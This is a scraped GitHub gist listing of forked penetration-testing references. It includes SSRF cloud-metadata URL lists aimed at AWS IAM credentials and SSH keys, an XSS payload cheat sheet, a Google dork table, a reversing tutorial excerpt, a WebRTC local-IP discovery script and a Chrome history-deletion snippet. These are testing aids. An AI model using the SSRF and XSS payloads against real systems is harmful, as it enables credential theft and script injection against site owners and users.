| Filter | Description | Example |
|---|---|---|
| allintext | Searches for occurrences of all the keywords given. | allintext:"keyword" |
| intext | Searches for the occurrences of keywords all at once or one at a time. | intext:"keyword" |
| inurl | Searches for a URL matching one of the keywords. | inurl:"keyword" |
| allinurl | Searches for a URL matching all the keywords in the query. | allinurl:"keyword" |
| intitle | Searches for occurrences of keywords in title all or one. | intitle:"keyword" |
mcdxn
/ cloud_metadata.txt
Created
May 6, 2020 14:12
— forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
mcdxn
/ cloud_metadata.txt
Created
May 6, 2020 13:22
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
mcdxn
/ google-subdomain-list.txt
Created
April 27, 2020 13:13
— forked from abuvanth/google-subdomain-list.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| www.google.com | |
| alt.aspmx.1.google.com | |
| client.1.google.com | |
| clients.1.google.com | |
| gmail-smtp-mas.1.google.com | |
| misc-anycast.1.google.com | |
| 104-cache-blicnet.google.com | |
| 119-cache-blicnet.google.com | |
| 216-239-45-10.google.com | |
| 31.google.com |
mcdxn
/ GoogleDorking.md
Created
March 11, 2020 05:32
— forked from sundowndev/GoogleDorking.md
Google dork cheatsheet
mcdxn
/ 01-reversing-cisco-ios-raw-binary-firmware-images-with-ghidra.md
Created
August 31, 2019 14:34
— forked from nstarke/01-reversing-cisco-ios-raw-binary-firmware-images-with-ghidra.md
Reversing Cisco IOS Raw Binary Firmware Images with Ghidra
This brief tutorial will show you how to go about analyzing a raw binary firmware image in Ghidra.
I was recently interested in reversing some older Cisco IOS images. Those images come in the form of a single binary blob, without any sort of ELF, Mach-o, or PE header to describe the binary.
While I am using Cisco IOS Images in this example, the same process should apply to other Raw Binary Firmware Images.
mcdxn
/ xss_vectors.txt
Created
June 16, 2019 15:15
— forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
mcdxn
/ getLocalPrivateIPAddress.js
Last active
February 22, 2022 19:27
Find out Local Private IP Address over the Internet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Code to find out Local IP Address of remote user. | |
| (function (){ | |
| window.RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; | |
| if (RTCPeerConnection) { | |
| var pc = new RTCPeerConnection({iceServers: []}), noop = function () { | |
| }; | |
| pc.createDataChannel(""); | |
| pc.createOffer(pc.setLocalDescription.bind(pc), noop); | |
| pc.onicecandidate = function (ice) { |
mcdxn
/ ChromeHistoryDeleteAll.js
Last active
February 22, 2022 19:27
Select and Delete All Specific Chrome Browser History Search Query in Console
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Tested on Chrome Version 72.0.3626.119 (Official Build) (64-bit) | |
| // 1) Open Chrome browser history. | |
| // 2) Search for specific history you want to delete. | |
| // 3) Cut-and-paste the code below in the Chrome Browser console. | |
| // Enjoy! | |
| (function (){ | |
| let historyApp = document.getElementById("history-app"); | |
| historyApp.items[0].selectAllItems(); |